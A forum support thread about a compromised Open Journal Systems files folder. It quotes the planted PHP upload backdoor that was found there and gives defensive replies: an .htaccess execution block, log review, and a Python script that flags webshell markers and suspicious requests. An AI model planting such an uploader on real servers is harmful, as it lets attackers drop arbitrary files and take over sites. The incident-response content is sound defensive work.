FILE folder hacked

Problem: FILE folder hacked.

Hello, yesterday I found it was not possible to upload files to galleys (HTTP error). I was looking for the reason (server error log, PHP setup… fileopen was enabled). Consequently I found it is not possible to access published articles in the present issue and in archived issues too. Consequently I looked in the FILE folder and found the problem. The default article folder was renamed. There was an index.php file with the following script:

<?php
// Dropped uploader: when the query string carries the "?blankkosong" key,
// it writes any POSTed "file" into the current directory under its original name.
if (isset($_GET['?blankkosong'])) {
    echo " ";
    echo "\n";
    if ($_FILES["file"]["upload"] > 0) {
        echo " " . $_FILES["file"]["upload"] . "\n";
    } else {
        echo " " . $_FILES["file"]["name"] . "\n";
    }
    if (file_exists("" . $_FILES["file"]["name"])) {
        echo $_FILES["file"]["name"] . " already exists ";
    } else {
        move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]);
    }
}
?>

Is it a security problem related to our server or is it a PKP OJS problem (we are using the latest version)?
We have the file folder located outside the installation folder.

Hi @Potravinarstvo1,

Is the files folder in a non-web-accessible location or protected from direct access?

Yes, the folder is not directly accessible; we have an .htaccess file in this folder.

So the files folder is in the web root? Do directives in .htaccess file prohibit the execution of scripts uploaded to the files folder?
I recommend also reading this post: Security issue: hacking of OJS 3.0.1 via submission - #5 by ctgraham

Check the log files: find where the file was downloaded from, how often the file was accessed and what else was loaded. Use folder permissions 0755. Use a file execution block:

<FilesMatch "\.((php[0-9]?)|p?html?|pl|sh|java|cpp|c|h|js|rc)$">
    SetHandler None
</FilesMatch>
<IfModule mod_rewrite.c>
    RewriteEngine Off
</IfModule>
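The advice above (check the logs for who fetched the script and how often, and make sure nothing in the files folder can execute) can be turned into a small triage script. The following is an added example, not code from this thread or from OJS itself: it lists files under the files directory whose extension the FilesMatch rule above would block, flags those containing upload or eval markers like the posted index.php, and tallies requests to such scripts in Apache combined-format access logs per client, separating out POSTs (the dropper takes its upload via POST). The directory layout, the dropper source and the log lines are constructed fixtures, and the `/files/` URL prefix is an assumption about where the files folder happens to be exposed; adjust `files_prefix` to your own path.

```python
"""Triage helpers for a compromised OJS files directory.

Added example: not code from this thread or from OJS. It assumes an
OJS-like layout (files/journals/<id>/articles/...), Apache combined-format
access logs, and that the files folder is served under the /files/ URL prefix.
"""
import os
import re
import tempfile
from collections import Counter

# Same extension list as the FilesMatch rule in the reply above.
EXEC_EXT = re.compile(r"\.((php[0-9]?)|p?html?|pl|sh|java|cpp|c|h|js|rc)$", re.I)

# Strings that legitimately uploaded galleys (PDF, HTML, images) should not contain.
WEBSHELL_MARKERS = ("$_FILES", "move_uploaded_file", "$_GET[", "eval(", "base64_decode(")

# Apache combined log format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed fixture: the dropper quoted in the first post, behaviour unchanged.
DROPPER_SRC = """<?php
if (isset($_GET['?blankkosong'])) {
    if (file_exists($_FILES["file"]["name"])) { echo "already exists"; }
    else { move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]); }
}
?>"""

# Constructed fixture: three hits on the dropper (one a POST) from one client,
# one ordinary article view, and one unparsable line.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2018:02:14:01 +0000] "GET /files/journals/1/articles/index.php?%3Fblankkosong=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2018:02:14:09 +0000] "POST /files/journals/1/articles/index.php?%3Fblankkosong=1 HTTP/1.1" 200 34 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Mar/2018:08:00:00 +0000] "GET /index.php/journal/article/view/12/9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2018:02:15:22 +0000] "GET /files/journals/1/articles/index.php?%3Fblankkosong=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    "this line is not in combined log format and is skipped",
]


def build_sample_tree():
    """Create a throwaway files directory holding one galley and the dropper."""
    root = tempfile.mkdtemp(prefix="ojs-files-")
    articles = os.path.join(root, "journals", "1", "articles")
    os.makedirs(articles)
    with open(os.path.join(articles, "index.php"), "w") as fh:
        fh.write(DROPPER_SRC)
    with open(os.path.join(articles, "12-9-1-PB.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4\n%constructed galley\n")
    return root


def find_executable_files(root):
    """Paths under root that the FilesMatch rule would refuse to execute.
    Nothing with these extensions belongs in the OJS files directory."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        hits.extend(os.path.join(dirpath, n) for n in names if EXEC_EXT.search(n))
    return sorted(hits)


def webshell_markers(path):
    """Which upload/eval markers the file contains (empty list means none)."""
    with open(path, "r", errors="replace") as fh:
        src = fh.read()
    return [m for m in WEBSHELL_MARKERS if m in src]


def suspicious_requests(log_lines, files_prefix="/files/"):
    """Count requests per (client, script) to executable files under the files
    folder, and list the POSTs to them (the dropper takes uploads via POST)."""
    counts = Counter()
    posts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if path.startswith(files_prefix) and EXEC_EXT.search(path):
            counts[(m.group("ip"), path)] += 1
            if m.group("method") == "POST":
                posts.append((m.group("ip"), m.group("ts"), m.group("path")))
    return counts, posts


if __name__ == "__main__":
    root = build_sample_tree()
    for p in find_executable_files(root):
        print("executable file in files dir:", p, webshell_markers(p))
    counts, posts = suspicious_requests(SAMPLE_LOG)
    for (ip, path), n in counts.most_common():
        print(f"{n:4d} hits  {ip}  {path}")
    for ip, ts, path in posts:
        print("upload attempt:", ip, ts, path)
```

Run it against the real files directory and access log instead of the fixtures; the first client to POST to the dropper is normally the one that planted it, and the GETs around that time show what else was fetched. After adding the FilesMatch block, confirm it took effect by requesting a harmless .php file you placed in the folder: if the server returns its source as plain text rather than executing it, the handler is off.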

OK - the problem is solved. We had installed a WordPress site in the same location as PKP OJS. This WordPress site was infected with malware. Consequently this malware affected the File folder.
We have removed this site and restored the site from backup.
